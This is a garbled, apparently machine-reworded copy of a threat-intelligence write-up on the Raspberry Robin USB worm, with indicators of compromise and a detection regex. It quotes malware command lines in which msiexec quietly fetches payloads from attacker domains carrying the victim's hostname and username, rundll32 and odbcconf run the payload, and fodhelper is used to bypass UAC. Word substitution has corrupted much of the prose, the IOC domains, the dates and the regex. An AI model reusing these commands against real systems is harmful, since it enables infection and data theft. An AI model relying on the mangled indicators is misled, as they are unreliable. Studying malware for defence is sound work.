not fairly Raspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks will lid the newest and most present info one thing just like the world. achieve entry to slowly thus you comprehend with ease and appropriately. will improve your data skillfully and reliably
Introduction
Throughout our menace looking workouts over the previous a number of months, we started to look at a particular sample of msiexec.exe utilization throughout totally different endpoints. As we delve into particular person property, we discover traces of a lately found malware referred to as Raspberry Robin. The RedCanary analysis staff first coined the title of this malware of their weblog submit, and Sekoia printed a Flash report on the exercise beneath the title QNAP Worm. Each articles provide glorious evaluation of malware conduct. Our findings assist and enrich earlier analysis on the subject.
execution chain
Raspberry Robin is a worm that spreads by way of an exterior drive. After the preliminary an infection, it downloads its payload by way of msiexec.exe of QNAP cloud accounts, run your code by way of rundll32.exe, and establishes a command and management (C2) channel by way of TOR connections.

Let’s stroll by way of the steps of the removing chain to see how this malware works.
Supply and Exploitation
Raspberry Robin is delivered by way of contaminated exterior drives. As soon as connected, cmd.exe attempt to execute instructions from a file inside that disk. This file is a .lnk file or a file with a particular naming sample. Recordsdata with this sample show a 2-5 character title with a usually obscure extension, together with .swy, .chk, .ico, .usb, .xml, and .cfg. As well as, the attacker makes use of an extreme variety of whitespace/non-printable characters and adjustments case to keep away from string matching detection strategies. Instance command strains embody:
- C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /RCmD
- C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /rcMD<[external disk name].LNk:qk
- C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /v /c CMd
- C:WindowsSystem32cmd.exe [redacted whitespace/non printable characters] /RC:WINDOWSsystem32cmd.exe
The pattern file for the supply could be discovered at this URL:
https://www.virustotal.com/gui/file/04c13e8b168b6f313745be4034db92bf725d47091a6985de9682b21588b8bcae/relationships
Subsequent, we observe explorer.exe operating with an obscure command line argument, generated by a earlier occasion of cmd.exe. This obscure argument appears to take the title of an contaminated exterior drive or .lnk file that was beforehand executed. A number of the samples had values that included USB, USB DISK, or USB Drive, whereas different samples had extra particular names. In every occasion of explorer.exe we see that the adversary is altering the case to keep away from detection:
- Explorer [redacted]
- explorer [redacted]
- Explorer usb drive
- USB DISK explorer
Facility
Postpartum and preliminary run, cmd.exe spawns msiexec.exe to obtain the Raspberry Robin payload. Makes use of -q both /q together with the usual set up parameter to function silently. As soon as once more, higher and decrease case letters are used to evade detection:
- mSIexeC -Q -IhTtP://NT3[.]XyZ:8080/[11 char long random string]/[computer name]=[username]
- mSIExEC /q /i HTTP://k6j[.]PW:8080/[11 char long random string]/[computer name]=[username]
- MSIExEC -q -I HTTP://6W[.]RE:8080/[11 char long random string]/[computer name]=[username]
- mSIExec /Q /IhTTP://0Dz[.]Me:8080/[11 char long random string]/[computer name]=[username]
- msIexec /Q -i http://doem[.]Re:8080/[11 char long random string]/[computer name]?[username]
- MSieXEC-Q-ihtTp://aIj[.]HK:8080/[11 char long random string]/[computer name]?[username]
As you possibly can see above, the URLs used for payload obtain have a particular sample. Domains use 2-4 character names with obscure TLDs that embody .xyz, .hk, .data, .pw, .cx, .me, and extra. The URL paths have a single listing with a random 11-character string, adopted by the sufferer’s hostname and username. In community telemetry, we additionally observe the home windows installer consumer agent on account of using msiexec.exe. To detect Raspberry Robin by way of its URL sample, use this common expression:
^http[s]0,1://[a-zA-Z0-9]2,4.[a-zA-Z0-9]2,6:8080/[a-zA-Z0-9]+/.*?(?:-|=|?).*?$
If we glance up the WHOIS info for given domains, we see that area registration dates return to February 2015. We additionally see a rise in registered domains from September 2021, which aligns with Raspberry’s preliminary observations. Robin by our friends.
WHOIS creation date | Rely |
9/12/2015 | 1 |
… | … |
8/10/2020 | 1 |
11/14/2020 | 1 |
3/7/2021 | 1 |
7/26/2021 | two |
09/11/2021 | two |
09/23/2021 | 9 |
09/24/2021 | 6 |
09/26/2021 | 4 |
09/27/2021 | two |
9/11/2021 | 3 |
10/11/2021 | 1 |
11/18/2021 | two |
11/21/2021 | 3 |
11/12/2021 | 7 |
12/31/2021 | 7 |
01/17/2022 | 6 |
01/30/2022 | eleven |
01/31/2022 | 3 |
04/17/2022 | 5 |
Desk 1: Distribution of area creation dates over time
Related domains have SSL certificates with the Topic Various Identify of q74243532.myqnapcloud.com, which factors to the underlying QNAP cloud infrastructure. Additionally, its URL shopping outcomes return login pages to QNAP’s QTS service:

As soon as the payload is downloaded, it runs by way of varied system binaries. First, rundll32.exe use the ShellExec_RunDLL perform of shell32.dll to make the most of system binaries, similar to msiexec.exe, odbcconf.exeboth management.exe. These binaries are used to execute the payload saved in C:ProgramData[3 chars]
- C:WINDOWSsystem32rundll32.exe shell32.dll ShellExec_RunDLL C:WINDOWSsyswow64MSIEXEC.EXE/FORCERESTART rfmda=HUFQMJFZWJSBPXH -NORESTART /QB -QR -y C:ProgramDataAzuwnjdgz.vhbd. -passive /QR /PROMPTRESTART -QR -qb /forcerestart
- C:Windowssystem32RUNDLL32.EXE shell32.dll ShellExec_RunDLLA C:Windowssyswow64odbcconf.exe -s -C -a regsvr C:ProgramDataTvbzhixyye.lock. /a CONFIGSYSDSN wgdpb YNPMVSV /A CONFIGDSN dgye AVRAU pzzfvzpihrnyj
- exe SHELL32, ShellExec_RunDLLA C:WINDOWSsyswow64odbcconf -E /c /C -a regsvr C:ProgramDataEuoikdvnbb.xml.
- C:WINDOWSsystem32rundll32.exe SHELL32,ShellExec_RunDLL C:WINDOWSsyswow64CONTROL.EXE C:ProgramDataLzmqkuiht.lkg.
Adopted by the execution of fodhelper.exe, which has the auto raised bit set to true. That is typically exploited by adversaries to bypass Consumer Account Management and execute extra instructions with escalated privileges. [3]. To observe suspicious executions of fodhelper.exe, we advise monitoring your situations with none command line arguments.
command and management
Raspberry Robin configures its C2 channel by way of operating extra system binaries with none command line arguments, which is sort of uncommon. That most likely factors to the injection of processes with elevated privileges in earlier steps of execution. Makes use of dllhost.exe, rundll32.exe, Y regsvr32.exe to arrange a TOR connection.
Detection by way of international menace alerts
In Cisco World Risk Alerts obtainable by way of Cisco Safe Community Analytics and Cisco Safe Endpoint, we monitor this exercise beneath the Raspberry Robin menace object. Picture 3 exhibits a pattern of Raspberry Robin detection:

conclusion
Raspberry Robin tries to go unnoticed by utilizing system binaries, case delicate, TOR-based C2, and abusing compromised QNAP accounts. Though we now have comparable intelligence gaps (how does it infect exterior drives, what are its actions on the goal) as our friends, we’re constantly monitoring their actions.
Indicators of compromise
Write | Surroundings | IOC |
Area | payload supply | k6j[.]p w |
Area | payload supply | kjaj[.]higher half |
Area | payload supply | v0[.]c x |
Area | payload supply | zk4[.]me |
Area | payload supply | zk5[.]co |
Area | payload supply | 0dz[.]me |
Area | payload supply | 0e[.]Sure |
Area | payload supply | 5qw[.]p w |
Area | payload supply | 6w[.]re |
Area | payload supply | 6xj[.]X and Z |
Area | payload supply | aij[.]hk |
Area | payload supply | b9[.]p.m |
Area | payload supply | glnj[.]nl |
Area | payload supply | j4r[.]X and Z |
Area | payload supply | j68[.]info |
Area | payload supply | j8[.]Sure |
Area | payload supply | jjl[.]a |
Area | payload supply | jzm[.]p w |
Area | payload supply | k6c[.]group |
Area | payload supply | kj1[.]X and Z |
Area | payload supply | kr4[.]X and Z |
Area | payload supply | l9b[.]group |
Area | payload supply | lwip[.]re |
Area | payload supply | mzjc[.]it’s |
Area | payload supply | nt3[.]X and Z |
Area | payload supply | what[.]Artwork |
Area | payload supply | tiua[.]United Kingdom |
Area | payload supply | vn6[.]co |
Area | payload supply | z7s[.]group |
Area | payload supply | k5x[.]X and Z |
Area | payload supply | 6 years[.]re |
Area | payload supply | doem[.]Re |
Area | payload supply | bpy[.]IN |
Area | payload supply | l5k[.]X and Z |
Area | payload supply | uQW[.]soccer |
Area | payload supply | t7[.]New Zealand |
Area | payload supply | 0t[.]yT |
References
- Raspberry Robin will get the worm early: https://redcanary.com/weblog/raspberry-robin/
- QNAP Worm: Who Income From Crime? – https://7095517.fs1.hubspotusercontent-na1.internet/hubfs/7095517/FLINTpercent202022-016percent20-%20QNAPpercent20worm_percent20whopercent20benefitspercent20frompercent20crimepercent20(1).pdf
- UAC Bypass – Fodhelper – https://pentestlab.weblog/2017/06/07/uac-bypass-fodhelper/
Share:
I hope the article not fairly Raspberry Robin: Extremely Evasive Worm Spreads over Exterior Disks provides notion to you and is beneficial for additive to your data
Raspberry Robin: Highly Evasive Worm Spreads over External Disks